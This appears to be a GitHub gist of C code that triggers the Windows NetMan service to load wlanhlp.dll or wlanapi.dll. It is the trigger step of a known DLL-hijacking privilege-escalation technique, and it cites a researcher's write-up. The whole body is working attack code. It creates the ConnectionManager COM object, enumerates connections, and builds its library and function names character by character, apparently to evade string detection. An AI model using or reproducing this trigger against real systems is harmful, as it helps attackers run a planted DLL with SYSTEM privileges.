Last active
October 11, 2024 13:36
-
-
Save v1stra/78e7f3a951706026fb70952180a04b81 to your computer and use it in GitHub Desktop.
Trigger NetMan to load wlanhlp.dll or wlanapi.dll in native C
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* https://itm4n.github.io/windows-server-netman-dll-hijacking/ */ | |
| #include <windows.h> | |
| #include <netcon.h> | |
| #include <stdio.h> | |
| /* https://github.com/reactos/reactos/blob/master/sdk/lib/uuid/otherguids.c */ | |
| DEFINE_GUID(IID_INetConnectionManager, 0xC08956A2,0x1CD3,0x11D1,0xB1,0xC5,0x00,0x80,0x5F,0xC1,0x27,0x0E); | |
| DEFINE_GUID(CLSID_ConnectionManager, 0xBA126AD1,0x2166,0x11D1,0xB1,0xD0,0x00,0x80,0x5F,0xC1,0x27,0x0E); | |
| void go() { | |
| INetConnectionManager * p_NetConnectionManager = NULL; | |
| IEnumNetConnection * p_EnumConnection = NULL; | |
| INetConnection * p_Connection = NULL; | |
| NETCON_PROPERTIES * p_ConnectionProperties = NULL; | |
| const char s_NetShell[] = { 'N', 'e', 't', 's', 'h', 'e', 'l', 'l', '.', 'd', 'l', 'l', 0 }; | |
| const char s_NcFreeNetconProperties[] = { 'N', 'c', 'F', 'r', 'e', 'e', 'N', 'e', 't', 'c', 'o', 'n', 'P', 'r', 'o', 'p', 'e', 'r', 't', 'i', 'e', 's', 0 }; | |
| ULONG count; | |
| HRESULT h_res; | |
| HMODULE h_NetShell; | |
| FARPROC NcFreeNetconProperties; | |
| h_NetShell = LoadLibrary(s_NetShell); | |
| if (h_NetShell == NULL) { | |
| printf("LoadLibrary failed with error %d\n", GetLastError()); | |
| return; | |
| } | |
| NcFreeNetconProperties = GetProcAddress(h_NetShell, s_NcFreeNetconProperties); | |
| if (NcFreeNetconProperties == NULL) { | |
| printf("GetProcAddress failed with error %d\n", GetLastError()); | |
| return; | |
| } | |
| /* Initialize the COM */ | |
| h_res = CoInitializeEx(0, COINIT_MULTITHREADED); | |
| if (FAILED(h_res)) { | |
| printf("CoInitializeEx failed with error %d\n", h_res); | |
| return; | |
| } | |
| /* Create COM Instance of NetConnectionManager */ | |
| h_res = CoCreateInstance(&CLSID_ConnectionManager, NULL, CLSCTX_ALL, &IID_INetConnectionManager, (void **)&p_NetConnectionManager); | |
| if (FAILED(h_res)) { | |
| printf("CoCreateInstance failed with error %d\n", h_res); | |
| CoUninitialize(); | |
| return; | |
| } | |
| h_res = p_NetConnectionManager->lpVtbl->EnumConnections(p_NetConnectionManager, NCME_DEFAULT, &p_EnumConnection); | |
| if (FAILED(h_res)) { | |
| printf("EnumConnections failed with error %d\n", h_res); | |
| CoUninitialize(); | |
| return; | |
| } | |
| /* Loop through the connections */ | |
| while(p_EnumConnection->lpVtbl->Next(p_EnumConnection, 1, &p_Connection, &count) == S_OK) { | |
| /* Get the properties of the connection */ | |
| h_res = p_Connection->lpVtbl->GetProperties(p_Connection, &p_ConnectionProperties); | |
| if(SUCCEEDED(h_res)) { | |
| wprintf(L"Interface: %ls\n", p_ConnectionProperties->pszwName); | |
| NcFreeNetconProperties(p_ConnectionProperties); | |
| } | |
| p_Connection->lpVtbl->Release(p_Connection); | |
| } | |
| p_EnumConnection->lpVtbl->Release(p_EnumConnection); | |
| p_NetConnectionManager->lpVtbl->Release(p_NetConnectionManager); | |
| CoUninitialize(); | |
| } | |
| int main(int argc, char ** argv, char ** envp) { | |
| go(); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment